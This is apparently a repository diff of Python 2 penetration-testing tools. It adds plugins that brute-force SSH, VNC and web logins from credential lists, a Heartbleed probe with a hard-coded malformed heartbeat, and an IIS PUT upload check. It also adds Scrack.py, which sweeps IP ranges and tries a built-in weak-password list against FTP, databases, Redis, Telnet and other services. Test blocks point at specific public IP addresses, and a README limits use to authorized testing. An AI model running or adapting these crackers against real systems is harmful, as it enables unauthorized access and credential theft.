#coding=utf-8
import time
import threading
from multiprocessing.dummy import Pool
from printers import printPink,printGreen
import paramiko
class ssh_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/ssh.conf")
def ssh_connect(self,ip,username,password,port):
crack=0
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip,port,username=username, password=password)
crack=1
client.close()
except Exception,e:
if e[0]=='Authentication failed.':
self.lock.acquire()
print "%s ssh service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
else:
self.lock.acquire()
print "connect %s ssh service at %s login fail " %(ip,port)
self.lock.release()
crack=2
return crack
def ssh_l(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.ssh_connect(ip,username,password,port)
if flag==2:
break
if flag==1:
self.lock.acquire()
printGreen("%s ssh at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s ssh at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['ssh']):
printPink("crack ssh now...")
print "[*] start crack ssh %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['ssh']:
pool.apply_async(func=self.ssh_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop ssh serice %s" % time.ctime()
print "[*] crack ssh done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'ssh': ['139.129.30.58:22']}
pinglist=['122.225.81.129']
test=ssh_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")

BIN
Bruteforce/plugins/ssh.pyc Normal file
View File

Binary file not shown.

145
Bruteforce/plugins/ssltest.py Normal file
View File

@ -0,0 +1,145 @@
#!/usr/bin/python
import sys
import struct
import socket
import select
import time
import threading
from printers import printPink,printRed
from multiprocessing.dummy import Pool
class ssl_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.hello = self.h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
self.hb = self.h2bin('''
18 03 02 00 03
01 40 00
''')
def h2bin(self,x):
return x.replace(' ', '').replace('\n', '').decode('hex')
def recvall(self,s, length, timeout=8):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(self,s):
hdr = self.recvall(s, 5)
if hdr is None:
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = self.recvall(s, ln, 10)
return typ, ver, pay
def hit_hb(self,s,ip,port):
s.send(self.hb)
while True:
typ, ver, pay = self.recvmsg(s)
if typ is None:
return False
if typ == 24:
if len(pay) > 3:
self.lock.acquire()
printRed('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
self.result.append('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
self.lock.release()
else:
self.lock.acquire()
printRed('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
self.result.append('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
self.lock.release()
return True
if typ == 21:
return False
def openssl_test(self,ip,port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
s.connect((ip, port))
sys.stdout.flush()
s.send(self.hello)
sys.stdout.flush()
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
break
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
sys.stdout.flush()
s.send(self.hb)
self.hit_hb(s,ip,port)
except Exception,e:
#print e
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['ssl']):
printPink("crack ssl now...")
print "[*] start test openssl_heart %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['ssl']:
pool.apply_async(func=self.openssl_test,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop ssl serice %s" % time.ctime()
print "[*] crack ssl done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'ssl': ['222.22.224.142:443']}
pinglist=['122.225.81.129']
test=ssl_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")

BIN
Bruteforce/plugins/ssltest.pyc Normal file
View File

Binary file not shown.

BIN
Bruteforce/plugins/tomcat.pyc Normal file
View File

Binary file not shown.

74
Bruteforce/plugins/vnc.py Normal file
View File

@ -0,0 +1,74 @@
from printers import printPink,printGreen
import time
import threading
from multiprocessing.dummy import Pool
from vnclib import *
class vnc_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/vnc.conf")
def vnc_connect(self,ip,port,password):
crack =0
try:
v = VNC()
v.connect(ip, port, 10)
code,mesg=v.login(password)
if mesg=='OK':
crack=1
except Exception,e:
crack=2
pass
return crack
def vnc_l(self,ip,port):
try:
for data in self.lines:
flag=self.vnc_connect(ip=ip,port=port,password=data)
if flag==2:
self.lock.acquire()
print "%s vnc at %s not allow connect now because of too many security failure" %(ip,port)
self.lock.release()
break
if flag==1:
self.lock.acquire()
printGreen("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data))
self.result.append("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data))
self.lock.release()
break
else:
self.lock.acquire()
print "login %s vnc service with %s fail " %(ip,data)
self.lock.release()
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['vnc']):
printPink("crack vnc now...")
print "[*] start crack vnc %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['vnc']:
pool.apply_async(func=self.vnc_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop vnc serice %s" % time.ctime()
print "[*] crack vnc done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)

BIN
Bruteforce/plugins/vnc.pyc Normal file
View File

Binary file not shown.

97
Bruteforce/plugins/vnclib.py Normal file
View File

@ -0,0 +1,97 @@
__author__ = 'wilson'
from Crypto.Cipher import DES
from sys import version_info
import time
class VNC_Error(Exception):
pass
class VNC:
def connect(self, host, port, timeout):
self.fp = socket.create_connection((host, port), timeout=timeout)
resp = self.fp.recv(99) # banner
self.version = resp[:11].decode('ascii')
if len(resp) > 12:
raise VNC_Error('%s %s' % (self.version, resp[12:].decode('ascii', 'ignore')))
return self.version
def login(self, password):
major, minor = self.version[6], self.version[10]
if (major, minor) in [('3', '8'), ('4', '1')]:
proto = b'RFB 003.008\n'
elif (major, minor) == ('3', '7'):
proto = b'RFB 003.007\n'
else:
proto = b'RFB 003.003\n'
self.fp.sendall(proto)
time.sleep(0.5)
resp = self.fp.recv(99)
if minor in ('7', '8'):
code = ord(resp[0:1])
if code == 0:
raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore'))
self.fp.sendall(b'\x02') # always use classic VNC authentication
resp = self.fp.recv(99)
else: # minor == '3':
code = ord(resp[3:4])
if code != 2:
raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore'))
resp = resp[-16:]
if len(resp) != 16:
raise VNC_Error('Unexpected challenge size (No authentication required? Unsupported authentication type?)')
pw = password.ljust(8, '\x00')[:8] # make sure it is 8 chars long, zero padded
key = self.gen_key(pw)
des = DES.new(key, DES.MODE_ECB)
enc = des.encrypt(resp)
self.fp.sendall(enc)
resp = self.fp.recv(99)
self.fp.close()
code = ord(resp[3:4])
mesg = resp[8:].decode('ascii', 'ignore')
if code == 1:
return code, mesg or 'Authentication failure'
elif code == 0:
return code, mesg or 'OK'
else:
raise VNC_Error('Unknown response: %s (code: %s)' % (repr(resp), code))
def gen_key(self, key):
newkey = []
for ki in range(len(key)):
bsrc = ord(key[ki])
btgt = 0
for i in range(8):
if bsrc & (1 << i):
btgt = btgt | (1 << 7-i)
newkey.append(btgt)
if version_info[0] == 2:
return ''.join(chr(c) for c in newkey)
else:
return bytes(newkey)

BIN
Bruteforce/plugins/vnclib.pyc Normal file
View File

Binary file not shown.

119
Bruteforce/plugins/web.py Normal file
View File

@ -0,0 +1,119 @@
#coding=utf-8
import threading
from printers import printPink,printRed,printGreen
from multiprocessing.dummy import Pool
import requests
import socket
import httplib
import time
import urlparse
import urllib2
import re
import base64
class web_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.tomcatlines=self.config.file2list("conf/tomcat.conf")
self.weblines=self.config.file2list("conf/web.conf")
def weblogin(self,url,ip,port,username,password):
try:
creak=0
header={}
login_pass=username+':'+password
header['Authorization']='Basic '+base64.encodestring(login_pass)
#header base64.encodestring 会多加一个回车号
header['Authorization']=header['Authorization'].replace("\n","")
r=requests.get(url,headers=header,timeout=8)
if r.status_code==200:
self.result.append("%s service at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.acquire()
printGreen("%s service at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
creak=1
else:
self.lock.acquire()
print "%s service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
except Exception,e:
pass
return creak
def webmain(self,ip,port):
#iis_put vlun scann
try:
url='http://'+ip+':'+str(port)+'/'+str(time.time())+'.txt'
r = requests.put(url,data='hi~',timeout=10)
if r.status_code==201:
self.lock.acquire()
printGreen('%s has iis_put vlun at %s\r\n' %(ip,port))
self.lock.release()
self.result.append('%s has iis_put vlun at %s\r\n' %(ip,port))
except Exception,e:
#print e
pass
#burp 401 web
try:
url='http://'+ip+':'+str(port)
url_get=url+'/manager/html'
r=requests.get(url_get,timeout=8)#tomcat
r2=requests.get(url,timeout=8)#web
if r.status_code==401:
for data in self.tomcatlines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.weblogin(url_get,ip,port,username,password)
if flag==1:
break
elif r2.status_code==401:
for data in self.weblines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.weblogin(url,ip,port,username,password)
if flag==1:
break
else:
pass
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['http']):
print "[*] start test web burp at %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['http']:
pool.apply_async(func=self.webmain,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop test iip_put&&scanner web paths at %s" % time.ctime()
print "[*] test iip_put&&scanner web paths done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'http': ['192.168.1.1:80']}
pinglist=['192.168.1.1']
test=web_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")

BIN
Bruteforce/plugins/web.pyc Normal file
View File

Binary file not shown.

12
Bruteforce/requirements.txt Normal file
View File

@ -0,0 +1,12 @@
MySQL-python 1.2.4
pymssql 2.1.1
impacket
requests
pysnmp 4.2.5
pycrypto 2.6.1
paramiko 1.1.5
python-ldap 2.4.13
pymongo 2.4
psycopg2
redis
IPy

BIN
Bruteforce/result/.DS_Store vendored Normal file
View File

Binary file not shown.

24
Scrack/README.md Normal file
View File

@ -0,0 +1,24 @@
# Scrack(服务弱口令检测脚本)
1. 功能
一款python编写的轻量级弱口令检测脚本目前支持以下服务FTP、MYSQL、MSSQL、MONGODB、REDIS、TELNET、ELASTICSEARCH、POSTGRESQL。
2. 特点
命令行、单文件,绿色方便各种情况下的使用。
无需任何外库以及外部程序支持所有协议均采用socket与内置库进行检测。
兼容OSX、LINUX、WINDOWSPython 2.6+(更低版本请自行测试,理论上均可运行)。
3. 参数说明
python Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10]
-h 必须输入的参数支持ip(192.168.1.1)ip段192.168.1ip范围指定192.168.1.1-192.168.1.254,ip列表文件ip.ini最多限制一次可扫描65535个IP。
-p 指定要扫描端口列表,多个端口使用,隔开 例如1433,3306,5432。未指定即使用内置默认端口进行扫描(21,23,1433,3306,5432,6379,9200,11211,27017)
-m 指定线程数量 默认100线程
-t 指定请求超时时间。
-d 指定密码字典。
-n 不进行存活探测(ICMP)直接进行扫描。
4. 使用例子
python Scrack.py -h 10.111.1
python Scrack.py -h 192.168.1.1 -d pass.txt
python Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6
python Scrack.py.py -h ip.ini -n
5. 法律声明
此脚本仅可用于授权的渗透测试以及自身的安全检测中。
此脚本仅用于学习以及使用,可自由进行改进,禁止提取加入任何有商业行为的产品中。

521
Scrack/Scrack.py Normal file
View File

@ -0,0 +1,521 @@
#coding:utf-8
import getopt
import sys
import Queue
import threading
import socket
import urllib2
import time
import os
import re
import ftplib
import hashlib
import struct
import binascii
import telnetlib
import array
queue = Queue.Queue()
mutex = threading.Lock()
TIMEOUT = 10
I = 0
USER_DIC = {
"ftp":['www','admin','root','db','wwwroot','data','web','ftp'],
"mysql":['root'],
"mssql":['sa'],
"telnet":['administrator','admin','root','cisco'],
"postgresql":['postgres','admin'],
"redis":['null'],
"mongodb":['null'],
"memcached":['null'],
"elasticsearch":['null']
}
PASSWORD_DIC = ['123456','admin','root','password','123123','123','1','{user}','{user}{user}','{user}1','{user}123','{user}2016','{user}2015','{user}!','','P@ssw0rd!!','qwa123','12345678','test','123qwe!@#','123456789','123321','1314520','666666','woaini','fuckyou','000000','1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456','1q2w3e4r','123qwe','159357','p@ssw0rd','p@55w0rd','password!','p@ssw0rd!','password1','r00t','tomcat','apache','system']
REGEX = [['ftp', '21', '^220.*?ftp|^220-|^220 Service|^220 FileZilla'], ['telnet', '23', '^\\xff[\\xfa-\\xfe]|^\\x54\\x65\\x6c|Telnet'],['mssql', '1433', ''], ['mysql', '3306', '^.\\0\\0\\0.*?mysql|^.\\0\\0\\0\\n|.*?MariaDB server'], ['postgresql', '5432', ''], ['redis', '6379', '-ERR|^\\$\\d+\\r\\nredis_version'], ['elasticsearch', '9200', ''], ['memcached', '11211', '^ERROR'], ['mongodb', '27017', '']]
class Crack():
def __init__(self,ip,port,server,timeout):
self.ip = ip
self.port = port
self.server = server
self.timeout = timeout
def run(self):
user_list = USER_DIC[self.server]
#print user_list
for user in user_list:
for pass_ in PASSWORD_DIC:
pass_ = str(pass_.replace('{user}', user))
k = getattr(self,self.server)
result = k(user,pass_)
if result:return result
def ftp(self,user,pass_):
try:
ftp=ftplib.FTP()
ftp.connect(self.ip,self.port)
ftp.login(user,pass_)
if user == 'ftp':return "anonymous"
return "username:%s,password:%s"%(user,pass_)
except Exception,e:
pass
def mysql(self,user,pass_):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((self.ip,int(self.port)))
packet = sock.recv(254)
plugin,scramble = self.get_scramble(packet)
if not scramble:return 3
auth_data = self.get_auth_data(user,pass_,scramble,plugin)
sock.send(auth_data)
result = sock.recv(1024)
if result == "\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00":
return "username:%s,password:%s" % (user,pass_)
def postgresql(self,user,pass_):#author:hos@YSRC
try:
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((self.ip,int(self.port)))
packet_length = len(user) + 7 +len("\x03user database postgres application_name psql client_encoding UTF8 ")
p="%c%c%c%c%c\x03%c%cuser%c%s%cdatabase%cpostgres%capplication_name%cpsql%cclient_encoding%cUTF8%c%c"%( 0,0,0,packet_length,0,0,0,0,user,0,0,0,0,0,0,0,0)
sock.send(p)
packet = sock.recv(1024)
psql_salt=[]
if packet[0]=='R':
a=str([packet[4]])
b=int(a[4:6],16)
authentication_type=str([packet[8]])
c=int(authentication_type[4:6],16)
if c==5:psql_salt=packet[9:]
else:return 3
buf=[]
salt = psql_salt
lmd5= self.make_response(buf,user,pass_,salt)
packet_length1=len(lmd5)+5+len('p')
pp='p%c%c%c%c%s%c'%(0,0,0,packet_length1 - 1,lmd5,0)
sock.send(pp)
packet1 = sock.recv(1024)
if packet1[0] == "R":
return "username:%s,password:%s" % (user,pass_)
except Exception,e:
return 3
def redis(self,user,pass_):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip,int(self.port)))
s.send("INFO\r\n")
result = s.recv(1024)
if "redis_version" in result:
return "unauthorized"
elif "Authentication" in result:
for pass_ in PASSWORD_DIC:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip,int(self.port)))
s.send("AUTH %s\r\n"%(pass_))
result = s.recv(1024)
if '+OK' in result:
return "username:%s,password:%s" % (user,pass_)
except Exception,e:
return 3
def mssql(self,user,pass_):#author:hos@YSRC
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.ip,self.port))
hh=binascii.b2a_hex(self.ip)
husername=binascii.b2a_hex(user)
lusername=len(user)
lpassword=len(pass_)
ladd=len(self.ip)+len(str(self.port))+1
hladd=hex(ladd).replace('0x','')
hpwd=binascii.b2a_hex(pass_)
pp=binascii.b2a_hex(str(self.port))
address=hh+'3a'+pp
hhost= binascii.b2a_hex(self.ip)
data="0200020000000000123456789000000000000000000000000000000000000000000000000000ZZ5440000000000000000000000000000000000000000000000000000000000X3360000000000000000000000000000000000000000000000000000000000Y373933340000000000000000000000000000000000000000000000000000040301060a09010000000002000000000070796d7373716c000000000000000000000000000000000000000000000007123456789000000000000000000000000000000000000000000000000000ZZ3360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000Y0402000044422d4c6962726172790a00000000000d1175735f656e676c69736800000000000000000000000000000201004c000000000000000000000a000000000000000000000000000069736f5f31000000000000000000000000000000000000000000000000000501353132000000030000000000000000"
data1=data.replace(data[16:16+len(address)],address)
data2=data1.replace(data1[78:78+len(husername)],husername)
data3=data2.replace(data2[140:140+len(hpwd)],hpwd)
if lusername>=16:
data4=data3.replace('0X',str(hex(lusername)).replace('0x',''))
else:
data4=data3.replace('X',str(hex(lusername)).replace('0x',''))
if lpassword>=16:
data5=data4.replace('0Y',str(hex(lpassword)).replace('0x',''))
else:
data5=data4.replace('Y',str(hex(lpassword)).replace('0x',''))
hladd = hex(ladd).replace('0x', '')
data6=data5.replace('ZZ',str(hladd))
data7=binascii.a2b_hex(data6)
sock.send(data7)
packet=sock.recv(1024)
if 'master' in packet:
return "username:%s,password:%s" % (user,pass_)
except:
return 3
def mongodb(self,user,pass_):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip,int(self.port)))
data = binascii.a2b_hex("3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000")
s.send(data)
result = s.recv(1024)
if "ismaster" in result:
getlog_data = binascii.a2b_hex("480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000")
s.send(getlog_data)
result = s.recv(1024)
if "totalLinesWritten" in result:
return "unauthorized"
else:return 3
except Exception,e:
return 3
def memcached(self,user,pass_):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip,int(self.port)))
s.send("stats\r\n")
result = s.recv(1024)
if "version" in result:
return "unauthorized"
def elasticsearch(self,user,pass_):
url = "http://"+self.ip+":"+str(self.port)+"/_cat"
data = urllib2.urlopen(url).read()
if '/_cat/master' in data:
return "unauthorized"
else:
return 3
def telnet(self,user,pass_):
try:
tn = telnetlib.Telnet(self.ip,self.port,self.timeout)
#tn.set_debuglevel(3)
time.sleep(0.5)
os = tn.read_some()
except Exception ,e:
return 3
user_match="(?i)(login|user|username)"
pass_match='(?i)(password|pass)'
login_match='#|\$|>'
if re.search(user_match,os):
try:
tn.write(str(user)+'\r\n')
tn.read_until(pass_match,timeout=2)
tn.write(str(pass_)+'\r\n')
login_info=tn.read_until(login_match,timeout=3)
tn.close()
if re.search(login_match,login_info):
return "username:%s,password:%s" % (user,pass_)
except Exception,e:
pass
else:
try:
info=tn.read_until(user_match,timeout=2)
except Exception,e:
return 3
if re.search(user_match,info):
try:
tn.write(str(user)+'\r\n')
tn.read_until(pass_match,timeout=2)
tn.write(str(pass_)+'\r\n')
login_info=tn.read_until(login_match,timeout=3)
tn.close()
if re.search(login_match,login_info):
return "username:%s,password:%s" % (user,pass_)
except Exception,e:
return 3
elif re.search(pass_match,info):
tn.read_until(pass_match,timeout=2)
tn.write(str(pass_)+'\r\n')
login_info=tn.read_until(login_match,timeout=3)
tn.close()
if re.search(login_match,login_info):
return "password:%s" % (pass_)
def get_hash(self,password, scramble):
hash_stage1 = hashlib.sha1(password).digest()
hash_stage2 = hashlib.sha1(hash_stage1).digest()
to = hashlib.sha1(scramble+hash_stage2).digest()
reply = [ord(h1) ^ ord(h3) for (h1, h3) in zip(hash_stage1, to)]
hash = struct.pack('20B', *reply)
return hash
def get_scramble(self,packet):
scramble,plugin = '',''
try:
tmp = packet[15:]
m = re.findall("\x00?([\x01-\x7F]{7,})\x00", tmp)
if len(m)>3:del m[0]
scramble = m[0] + m[1]
except:
return '',''
try:
plugin = m[2]
except:
pass
return plugin,scramble
def get_auth_data(self,user,password,scramble,plugin):
user_hex = binascii.b2a_hex(user)
pass_hex = binascii.b2a_hex(self.get_hash(password,scramble))
data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0014" + pass_hex
if plugin:data+=binascii.b2a_hex(plugin)+ "0055035f6f73076f737831302e380c5f636c69656e745f6e616d65086c69626d7973716c045f7069640539323330360f5f636c69656e745f76657273696f6e06352e362e3231095f706c6174666f726d067838365f3634"
len_hex = hex(len(data)/2).replace("0x","")
auth_data = len_hex + "000001" +data
return binascii.a2b_hex(auth_data)
def make_response(self,buf,username,password,salt):
pu=hashlib.md5(password+username).hexdigest()
buf=hashlib.md5(pu+salt).hexdigest()
return 'md5'+buf
class SendPingThr(threading.Thread):
def __init__(self, ipPool, icmpPacket, icmpSocket, timeout=3):
threading.Thread.__init__(self)
self.Sock = icmpSocket
self.ipPool = ipPool
self.packet = icmpPacket
self.timeout = timeout
self.Sock.settimeout(timeout + 1)
def run(self):
time.sleep(0.01)
for ip in self.ipPool:
try:
self.Sock.sendto(self.packet, (ip, 0))
except socket.timeout:
break
time.sleep(self.timeout)
class Nscan:
def __init__(self, timeout=3):
self.timeout = timeout
self.__data = struct.pack('d', time.time())
self.__id = os.getpid()
if self.__id >= 65535:self.__id = 65534
@property
def __icmpSocket(self):
Sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp"))
return Sock
def __inCksum(self, packet):
if len(packet) & 1:
packet = packet + '\0'
words = array.array('h', packet)
sum = 0
for word in words:
sum += (word & 0xffff)
sum = (sum >> 16) + (sum & 0xffff)
sum = sum + (sum >> 16)
return (~sum) & 0xffff
@property
def __icmpPacket(self):
header = struct.pack('bbHHh', 8, 0, 0, self.__id, 0)
packet = header + self.__data
chkSum = self.__inCksum(packet)
header = struct.pack('bbHHh', 8, 0, chkSum, self.__id, 0)
return header + self.__data
def mPing(self, ipPool):
Sock = self.__icmpSocket
Sock.settimeout(self.timeout)
packet = self.__icmpPacket
recvFroms = set()
sendThr = SendPingThr(ipPool, packet, Sock, self.timeout)
sendThr.start()
while True:
try:
ac_ip = Sock.recvfrom(1024)[1][0]
if ac_ip not in recvFroms:
log("active",ac_ip,0,None)
recvFroms.add(ac_ip)
except Exception:
pass
finally:
if not sendThr.isAlive():
break
return recvFroms & ipPool
def get_ac_ip(ip_list):
try:
s = Nscan()
ipPool = set(ip_list)
return s.mPing(ipPool)
except Exception,e:
print 'The current user permissions unable to send icmp packets'
return ip_list
class ThreadNum(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
try:
if queue.empty():break
queue_task = self.queue.get()
except:
break
try:
task_type,task_host,task_port = queue_task.split(":")
if task_type == 'portscan':
data = scan_port(task_host,task_port)
if data:
server_name = server_discern(task_host,task_port,data)
if server_name:
log('discern',task_host,task_port,server_name)
queue.put(":".join([server_name,task_host,task_port]))
else:
result = pass_crack(task_type,task_host,task_port)
if result and result !=3:log(task_type,task_host,task_port,result)
except Exception,e:
continue
def scan_port(host,port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((str(host),int(port)))
log('portscan',host,port)
except Exception,e:
return False
try:
data = sock.recv(512)
if len(data) > 2:
return data
else:
sock.send('a\n\n')
data = sock.recv(512)
sock.close()
if len(data) > 2:
return data
else:
return 'NULL'
except Exception,e:
sock.close()
return 'NULL'
def log(scan_type,host,port,info=''):
mutex.acquire()
time_str = time.strftime('%X', time.localtime( time.time()))
if scan_type == 'portscan':
print "[%s] %s:%d open"%(time_str,host,int(port))
elif scan_type == 'discern':
print "[%s] %s:%d is %s"%(time_str,host,int(port),info)
elif scan_type == 'active':
print "[%s] %s active" % (time_str, host)
elif info:
log = "[*%s] %s:%d %s %s"%(time_str,host,int(port),scan_type,info)
print log
log_file = open('result.log','a')
log_file.write(log+"\r\n")
log_file.close()
mutex.release()
def server_discern(host,port,data):
for mark_info in REGEX:
try:
name,default_port,reg = mark_info
if reg and data <> 'NULL':
matchObj = re.search(reg,data,re.I|re.M)
if matchObj:
return name
elif int(default_port) == int(port):
return name
except Exception,e:
#print e
continue
def pass_crack(server_type,host,port):
m = Crack(host,port,server_type,TIMEOUT)
return m.run()
def get_password_dic(path):
pass_list = []
try:
file_ = open(path,'r')
for password in file_:
pass_list.append(password.strip())
file_.close()
return pass_list
except:
return 'read dic error'
def get_ip_list(ip):
ip_list = []
iptonum = lambda x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])])
numtoip = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)])
if '-' in ip:
ip_range = ip.split('-')
ip_start = long(iptonum(ip_range[0]))
ip_end = long(iptonum(ip_range[1]))
ip_count = ip_end - ip_start
if ip_count >= 0 and ip_count <= 65536:
for ip_num in range(ip_start,ip_end+1):
ip_list.append(numtoip(ip_num))
else:
print '-h wrong format'
elif '.ini' in ip:
ip_config = open(ip,'r')
for ip in ip_config:
ip_list.extend(get_ip_list(ip.strip()))
ip_config.close()
else:
ip_split=ip.split('.')
net = len(ip_split)
if net == 2:
for b in range(1,255):
for c in range(1,255):
ip = "%s.%s.%d.%d"%(ip_split[0],ip_split[1],b,c)
ip_list.append(ip)
elif net == 3:
for c in range(1,255):
ip = "%s.%s.%s.%d"%(ip_split[0],ip_split[1],ip_split[2],c)
ip_list.append(ip)
elif net ==4:
ip_list.append(ip)
else:
print "-h wrong format"
return ip_list
def t_join(m_count):
tmp_count = 0
i = 0
if I < m_count:
count = len(ip_list) + 1
else:
count = m_count
while True:
time.sleep(4)
ac_count = threading.activeCount()
#print ac_count,count
if ac_count < count and ac_count == tmp_count:
i+=1
else:
i=0
tmp_count = ac_count
#print ac_count,queue.qsize()
if (queue.empty() and threading.activeCount() <= 1) or i > 5:
break
def put_queue(ip_list,port_list):
for ip in ip_list:
for port in port_list:
queue.put(":".join(['portscan',ip,port]))
if __name__=="__main__":
msg = '''
Usage: python Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10] [-d pass.txt] [-n]
'''
if len(sys.argv) < 2:
print msg
try:
options,args = getopt.getopt(sys.argv[1:],"h:p:m:t:d:n")
ip = ''
port = '21,23,1433,3306,5432,6379,9200,11211,27017'
m_count = 100
ping = True
for opt,arg in options:
if opt == '-h':
ip = arg
elif opt == '-p':
port = arg
elif opt == '-m':
m_count = int(arg)
elif opt == '-t':
TIMEOUT = int(arg)
elif opt == '-n':
ping = False
elif opt == '-d':
PASSWORD_DIC = get_password_dic(arg)
socket.setdefaulttimeout(TIMEOUT)
if ip:
ip_list = get_ip_list(ip)
if ping:ip_list = get_ac_ip(ip_list)
port_list = port.split(',')
for ip_str in ip_list:
for port_int in port_list:
I+=1
queue.put(':'.join(['portscan',ip_str,port_int]))
